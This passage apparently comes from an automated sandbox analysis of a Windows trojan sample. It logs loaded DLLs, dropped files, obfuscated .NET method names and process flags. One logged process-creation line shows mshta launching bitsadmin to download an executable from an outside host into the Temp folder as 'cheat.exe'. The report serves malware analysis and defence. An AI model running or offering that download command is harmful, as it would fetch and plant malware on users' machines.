          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: bitsproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: System.Runtime.Serialization.ni.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Data.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Xml.ni.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.pdb 2 source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.ni.pdbRSDS source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.000002268033F000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: System.Configuration.ni.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Data.ni.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Data.ni.pdbRSDSC source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Configuration.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Xml.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.pdb source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.000002268033F000.00000004.00000800.00020000.00000000.sdmp, WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Xml.ni.pdbRSDS# source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Core.ni.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Data.pdbH source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Numerics.ni.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: mscorlib.pdb p source: WERE576.tmp.dmp.12.dr
          Source: Binary string: mscorlib.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: BootstrapperV1.19.exe, 00000002.00000002.2125161031.00000226E8E66000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.ni.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Core.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Runtime.Serialization.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Numerics.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.ni.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Core.ni.pdbRSDS source: WERE576.tmp.dmp.12.dr
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeCode function: 0_2_00007FFD9B7000AD pushad ; iretd 0_2_00007FFD9B7000C1
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeCode function: 2_2_00007FFD9B715A0D push edx; retf 2_2_00007FFD9B7159DB
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeCode function: 2_2_00007FFD9B7159E0 push edx; retf 2_2_00007FFD9B7159DB
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeCode function: 2_2_00007FFD9B7160F6 push esp; ret 2_2_00007FFD9B716139
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeCode function: 2_2_00007FFD9B715909 push edx; retf 2_2_00007FFD9B7159DB
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeCode function: 2_2_00007FFD9B715948 push edx; retf 2_2_00007FFD9B7159DB
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeCode function: 2_2_00007FFD9B70D893 push 8B485F4Bh; iretd 2_2_00007FFD9B70D89B
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeCode function: 2_2_00007FFD9B711ED0 push esp; ret 2_2_00007FFD9B716139
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeCode function: 2_2_00007FFD9B7146D8 push esp; retf 2_2_00007FFD9B7146D9
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeStatic PE information: section name: .text entropy: 7.998024903988678
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe, J3bNBBaEj3XpotbKkdmI2LHeIo6vzeGA9owP.csHigh entropy of concatenated method names: 'bhFViFnVTAJvqX52Huv9Lwtp4GgZ3AIhomUk', 'Vl7lE9r1BdgyyoWEiDhMvm3JrrX1UyYHFYWK', 'Do20jlpZL3VUljnG65apy0gUHfT7Pj3KTKiW', 'WCgaLvNuFRyyZ0IgxQ0AtTwOrrJaPi4TS4hd', 'ngJEom17n8DocYyU6KBoo8t9G2Tw3MELHyiW', 'aXtPYyC6WscWby3Qc1nAhpvGjCZrbRCoF6gl', '_6tnzvonW56ELrUebvZqzIyGnDR6iRsUKxMIu', 'sUhNuhoog0K45hpcCx9wiYODSbbceOZg7uGK', 'ezkF5P0dhgu2f5dxlgHMKLttaLSMutMJifSd', '_9nWz4yxNIKppv2UE5CH65tH3ctLgVbBINAnw'
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe, CL7y0BCvM3ox66FIaQoqW8cIKqSeQcWw1csq.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_7cpKXRoyYs0wOJKv8X7kitC7ifExUjrHXQUJ', 'rBkrAMqdY4E8l4p5ZYjVreDoVB0SgakFyLBN', 'GQYb04q2ltnxZ4Boyl4zVKVxB9bQZblobCy0', 'UwpHAQTDjChblu92YW7Btfh04q9FtnEPuXQJ'

          Persistence and Installation Behavior

          barindex
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://envs.sh/wUB.exe C:\Users\user\AppData\Local\Temp\cheat.exe
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://envs.sh/wUB.exe C:\Users\user\AppData\Local\Temp\cheat.exeJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeFile created: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeJump to dropped file
          Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\BITD1EE.tmpJump to dropped file
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
